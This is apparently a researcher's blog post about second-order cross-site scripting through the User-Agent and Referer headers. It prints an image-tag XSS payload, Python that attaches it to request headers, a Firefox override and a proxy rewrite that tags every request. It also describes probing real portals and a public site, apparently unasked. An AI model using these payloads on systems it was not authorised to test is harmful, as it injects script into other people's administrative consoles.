User-agent attacks
A few years ago I started an experiment to gauge how many Web portals and administrative consoles were vulnerable to second-order cross-site scripting attacks.
At the time, I was investigating the impact of “unexpected” recycling of user-supplied data, since it was proving to be an interesting attack vector for pentests. That work led to the whitepaper “Second-order Code Injection” and was ultimately incorporated into several Web application security testing methodologies.
Anyhow, I was explaining the concept to a colleague a couple of weeks ago and I figured I’d check some Web logs to see if there was still any evidence of the vulnerable consoles. To my surprise, even a couple of years after stopping the project, there were still vulnerable consoles “pinging” away.
Unwanted Content Analysis
At the time I experimented with various fields commonly “analyzed” within administrator portals, such as REFERER, ACCEPT, ACCEPT-CHARSET and USER-AGENT. The most consistently vulnerable fields I encountered were REFERER and USER-AGENT. While the REFERER was commonly filtered correctly, I did notice that some popular portals liked to report on things such as “Search Fields”, which were automatically extracted from the REFERER data of, say, a Google link. The most interesting field of all, however, was the USER-AGENT.
By embedding simple XSS HTML code segments inside the REFERER and USER-AGENT fields such as…
User-Agent: "><img src="http://www.technicalinfo.net/vulnerable.jpg"><!--
… it was possible to elicit a response from the vulnerable portal at a later date when the administrator (or other data analyst) viewed the appropriate reports.
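Planting the probe takes nothing more than a standard HTTP library. The sketch below (the target URL is a placeholder for whatever portal you are testing) builds a request whose USER-AGENT and REFERER fields carry the image-tag payload:

```python
import urllib.request

# Hypothetical target: any portal that later renders these headers in a report.
TARGET = "http://example.com/"

# Probe payload: breaks out of an HTML attribute and requests a tracking image
# from a server whose logs you control.
PROBE = '"><img src="http://www.technicalinfo.net/vulnerable.jpg"><!--'

req = urllib.request.Request(TARGET, headers={
    "User-Agent": PROBE,
    "Referer": PROBE,
})

# The request object now carries the tainted headers; sending it is just
# urllib.request.urlopen(req). If the portal later echoes a header unescaped
# into a report page, the image fetch shows up in your own Web logs.
print(req.get_header("User-agent"))
```

If the report viewer's browser later fetches vulnerable.jpg, you know the portal reflected the header without encoding it.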
In the end, the USER-AGENT field proved to be the most interesting, not only because it got the most results, but also because it was the easiest one to test. For example, you can easily modify the USER-AGENT data in Firefox by just adding a new configuration value (read this).
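Concretely, the configuration value in question is the general.useragent.override string preference, which can be created in about:config or dropped into a user.js file in the Firefox profile directory (the override string below is just an illustrative placeholder):

```js
// user.js -- overrides the User-Agent header for every request this profile makes.
// The value here is a placeholder; substitute whatever test string you need.
user_pref("general.useragent.override", "Mozilla/5.0 (test-rig)");
```

Delete the preference to return to the browser's normal User-Agent.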
By making use of a simple proxy, you can also dynamically rewrite the USER-AGENT of every Web browser page request (regardless of the browser in use) to include your own host name, and later identify the vulnerable sites when you browse your own Web logs. It actually sounds harder than it is.
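The proxy's core operation is a one-line header rewrite; everything else is plumbing. A minimal sketch of that rewrite, assuming a probe that points back at a server whose logs you control (the hostname is a placeholder):

```python
# Sketch of the rewrite a tagging proxy applies to each outbound request.
# The hostname in the probe is a placeholder for a log server you control;
# seeing a hit for probe.jpg in its logs identifies the vulnerable site.
PROBE = '"><img src="http://uascan.example.net/probe.jpg"><!--'

def tag_user_agent(raw_headers: str, probe: str = PROBE) -> str:
    """Append the tracking probe to the User-Agent line of a raw header block."""
    out = []
    for line in raw_headers.split("\r\n"):
        if line.lower().startswith("user-agent:"):
            line = line + " " + probe
        out.append(line)
    return "\r\n".join(out)

request = "GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
print(tag_user_agent(request))
```

A real proxy would apply this function to every request passing through it and leave all other headers untouched, which is exactly what the loop above does.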
Today, the vector is probably even more important. With professional cyber-criminal teams seeking to compromise any Web site they can in order to embed malicious drive-by-malware iFrames, host Phishing sites, or boost the Page-Rank of other sites they control to earn advertising money, it seems that this attack vector will remain popular for quite some time to come.
That said, I guess I should apologize to a colleague of mine. After having explained how to change his Firefox USER-AGENT details, I suggested that he visit www.whatsmyuseragent.com to make sure the modifications worked. Unfortunately I happened to get there before him with my own modified USER-AGENT string, and the site lists the last 18 or so agents it has seen… :-)